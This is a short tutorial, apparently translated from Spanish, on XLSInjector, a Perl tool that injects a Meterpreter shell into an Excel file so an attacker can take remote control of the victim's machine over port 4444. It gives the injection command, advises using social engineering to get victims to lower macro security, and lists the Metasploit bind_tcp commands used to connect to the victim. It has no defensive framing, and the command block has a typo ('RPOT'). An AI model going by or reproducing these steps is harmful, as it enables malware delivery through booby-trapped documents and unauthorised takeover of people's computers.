XLSInjector – Inject Shell Meterpreter Files in Excel

It is a tool created in perl by keith lee that it allows to inject into a Microsoft Excel file XLS console meterpreter (running everything in RAM without creating additional processes), allowing us to access to the remotely by port 4444 and take total control of the machine.

For XLSInjector to function properly, we need the following:

* A machine (virtual or real) with Windows
* Microsoft Excel
* Perl
* Win32 : ole for Perl module
* An XML file to infect
* The XLSInjector
* and finally the Metasploit Framework

After you have all the elements necessary for the proper functioning of the XLSInjector we go to his execution, which is quite simple:

Code:

perl xlsinjector.pl -i excelfile.xls -o fileConShellexcel.xls

But not everything is so simple with this tool, it turns out that XLSInjector NO jumps made by Microsoft in its Office suite, scripting filters so it touches to convince, through social engineering or any other technique that the same user put the low macro security and that "trust" VB projects, tricky but sure with some presumption gets to perform these tasks.

Assuming that already were the proper settings for the correct functioning of the XLSInjector we will remotely access our shell meterpreter using Metasploit Framework console

We start the metasploit console:

Code:

set payload windows/meterpreter/bind_tcp
set RHOST ipdelpcvictima
set RPOT 4444
exploit